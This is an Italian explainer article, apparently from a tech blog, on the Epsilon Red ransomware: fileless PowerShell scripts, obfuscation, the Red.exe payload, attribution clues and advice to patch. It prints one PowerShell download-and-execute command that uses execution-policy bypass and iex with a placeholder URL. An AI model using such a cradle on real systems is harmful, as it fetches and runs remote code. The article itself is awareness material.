Cosè il ransomware Epsilon Red?

Hai già patchato i tuoi server ?

Una nuova minaccia ransomware , denominata Epsilon Red, prende di mira i server basati su Microsoft senza patch nei data center aziendali. Prende il nome da un cattivo poco conosciuto dei fumetti Marvel, Epsilon Red è stato recentemente scoperto da una società di sicurezza informatica chiamata Sophos. Dalla sua scoperta, il ransomware ha attaccato molte organizzazioni in tutto il mondo.

Il ransomware senza file si "nasconde" in PowerShell

Il ransomware fileless è una forma di malware che viene eseguita raggruppando software legittimo. Il malware fileless basato su PowerShell sfrutta la capacità di PowerShell di caricarsi direttamente nella memoria del dispositivo. Questa funzionalità aiuta a proteggere il malware negli script PowerShell dal rilevamento.

In uno scenario tipico, quando viene eseguito uno script, è necessario prima scriverlo sull'unità del dispositivo. Ciò consente alle soluzioni di sicurezza degli endpoint di rilevare gli script. Poiché PowerShell è escluso dai processi di esecuzione degli script standard, può ignorare la sicurezza dell'endpoint. Inoltre, l'utilizzo del parametro bypass in uno script di PowerShell consente a un utente malintenzionato di aggirare le restrizioni sugli script di rete.

Un esempio di parametro di bypass di PowerShell è:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

Come puoi vedere, progettare i parametri di bypass di PowerShell è relativamente semplice.

In risposta, Microsoft ha rilasciato una patch per risolvere una vulnerabilità legata all'esecuzione remota di malware correlata a PowerShell. Tuttavia, i cerotti sono efficaci solo nella misura in cui vengono utilizzati. Molte organizzazioni hanno allentato gli standard di applicazione delle patch, rendendo i loro ambienti vulnerabili agli attacchi. Il design di Epsilon Red è quello di sfruttare questo livello di vulnerabilità.

La doppia utilità di Epsilon Red

Poiché Epsilon Red è più efficace contro i server Microsoft senza patch, il malware può essere utilizzato come ransomware e strumento di identificazione. Il fatto che Epsilon abbia successo o meno in un ambiente offre agli aggressori una visione più approfondita delle capacità di sicurezza del loro obiettivo.

Se Epsilon riesce ad accedere a Microsoft Exchange Server, significa che l'organizzazione non sta seguendo le migliori pratiche comuni di sicurezza per l'applicazione delle patch. Per l'aggressore, questo dimostra quanto facilmente il resto dell'ambiente del bersaglio possa essere compromesso da Epsilon.

Epsilon Red usa l'Offuscamento per nascondere il suo carico utile. L'offuscamento rende il codice illeggibile e viene utilizzato nel malware PowerShell per evitare un'elevata leggibilità degli script PowerShell. Con l'offuscamento, i cmdlet degli alias di PowerShell vengono utilizzati per rendere difficile al software antivirus l'identificazione degli script dannosi nei log di PowerShell.

Epsilon Red è più efficace contro i server Microsoft senza patch

Tuttavia, gli script PowerShell offuscati possono ancora essere identificati. Un segno comune di un imminente attacco PowerShell Script è la creazione di un oggetto WebClient. Un utente malintenzionato creerà un oggetto WebClient nel codice PowerShell per stabilire una connessione esterna a un URL remoto contenente codice dannoso.

Se un'organizzazione viene attaccata, la probabilità che disponga di misure di sicurezza sufficienti per rilevare script PowerShell offuscati è molto bassa. Al contrario, se Epsilon Red non riesce a penetrare nel server, ciò indicherà all'aggressore che la rete del bersaglio può decrittografare rapidamente il malware PowerShell, rendendo l'attacco meno prezioso.

Epsilon Red intrusione informatica

La funzionalità di Epsilon Red è molto semplice. Il software utilizza una serie di script Powershell per infiltrarsi nei server. Questi script di PowerShell sono numerati da 1.ps1 a 12.ps1. La progettazione di ogni script di PowerShell consiste nel preparare un server di destinazione per il payload finale.

Tutti gli script PowerShell in Epsilon Red hanno il proprio scopo. Uno degli script PowerShell in Epsilon Red è progettato per risolvere le regole del firewall di rete della destinazione. Un altro software di questa serie progettato per disinstallare il software antivirus del bersaglio .

Come puoi immaginare, questi script funzionano in sincronia per garantire che una volta consegnato il carico utile, il bersaglio non possa interrompere rapidamente il suo progresso.

• Cos'è il ransomware Ryuk? Come evitarlo?

Trasmettere il carico utile

Una volta che gli script PowerShell di Epsilon hanno lasciato il posto al suo payload finale, viene distribuito come estensione, Red.exe . Quando entra nel server, Red.exe eseguirà la scansione dei file del server e creerà un elenco di percorsi di directory per ogni file rilevato. Dopo aver creato l'elenco, i processi secondari vengono creati dal file malware principale per ciascun percorso di directory nell'elenco. Quindi, ciascun file secondario del ransomware crittografa un percorso di directory dal file di elenco.

Dopo che tutti i percorsi delle cartelle nell'elenco Epson sono stati crittografati, verrà lasciato un file .txt per informare il bersaglio e indicare la richiesta dell'aggressore. Inoltre, tutti i nodi di rete accessibili collegati al server compromesso verranno compromessi e la probabilità che malware entri nella rete potrebbe aumentare.

Chi c'è dietro Epsilon Red?

Le identità degli aggressori dietro Epsilon Red sono ancora sconosciute

Le identità degli aggressori dietro Epsilon Red sono ancora sconosciute. Alcuni indizi però puntano alla provenienza degli aggressori. Il primo indizio è il nome del malware. Epsilon Red è un cattivo degli X-Men con una storia di origini russe.

Il secondo indizio si trova nella richiesta di riscatto del file .txt lasciato dal codice. È simile alla nota lasciata da una banda di ransomware chiamata REvil. Tuttavia, questa somiglianza non indica che gli aggressori fossero membri di questa banda. REvil gestisce un'operazione RaaS (Ransomware as a service) in cui gli affiliati pagano REvil per l'accesso al suo malware.

Proteggiti da Epsilon Red

Finora, Epsilon Red è riuscito a penetrare nei server senza patch. Ciò significa che una delle migliori protezioni contro Epsilon Red e malware ransomware simili è garantire che il tuo ambiente sia gestito correttamente. Inoltre, disporre di una soluzione di sicurezza in grado di decrittografare rapidamente gli script PowerShell sarebbe un'utile aggiunta al tuo ambiente.